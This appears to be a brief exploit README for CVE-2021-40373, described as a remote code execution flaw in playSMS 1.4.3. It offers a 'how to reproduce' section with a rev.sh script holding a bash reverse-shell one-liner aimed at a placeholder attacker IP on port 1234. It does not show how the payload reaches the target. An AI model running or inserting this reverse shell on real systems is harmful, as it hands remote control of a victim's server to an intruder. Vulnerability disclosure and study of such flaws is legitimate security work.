/CVE-2021-40373

CVE-2021-40373 - remote code execution

CVE-playsms

There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.

how to reproduce RCE (shell):

https://playsms.org/

rev.sh

#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"